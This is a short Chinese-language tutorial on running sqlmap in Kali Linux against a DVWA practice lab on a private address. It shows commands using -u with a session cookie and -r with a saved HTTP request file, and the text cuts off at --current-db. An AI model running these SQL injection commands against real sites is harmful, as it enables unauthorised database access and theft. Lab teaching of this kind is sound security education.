kali中sqlmap的使用
sqlmap简介:
SQLmap是一个自动化的SQL注入攻击,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。
目前支持Mysql、Oracle、MS-SQL、PostgreSQL与Access等数据库。
SQLmap采用几种独特的SQL注入技术,分别是盲推理SQL注入,UNION查询SQL注入,对查询和盲注。其广泛的功能和选项包含数据库指纹、枚举、数据库提取,访问目标文件系统,并在获取完全操作权限时实行任意命令。
sqlmap使用(本次是利用kail linux中自带的sqlmap进行介绍)
sqlmap -u(参数指定目标注入地址)检测出存在的利用漏洞
格式:sqlmap -u "url地址" --cookie="cookie信息" (若不需要登录就不需要后面的cookie)
获取系统基本信息(需要携带登录态,若不需要登录就不需要携带cookie)
root@tiankali:~# sqlmap -u "http://192.168.1.77:88/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=1cegouc0pe4am7rup4m2t4a746"
显示系统信息:
以上使用-u需要输入很多http的头部信息,我们可以使用-r,将http中的头部和cookie信息放到一个文件中;
sqlmap -r
格式:sqlmap -r 文件名 备注:创建的header.txt文件一定要在当前sqlmap的目录下面
创建header.txt文件,将header头部信息复制保持到该文件中;
GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Host: 192.168.1.77:88
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: security=low; PHPSESSID=1cegouc0pe4am7rup4m2t4a746
root@tiankali:~# sqlmap -r headersqlmap.txt
同样也获取到系统信息
--current-db
格式:sql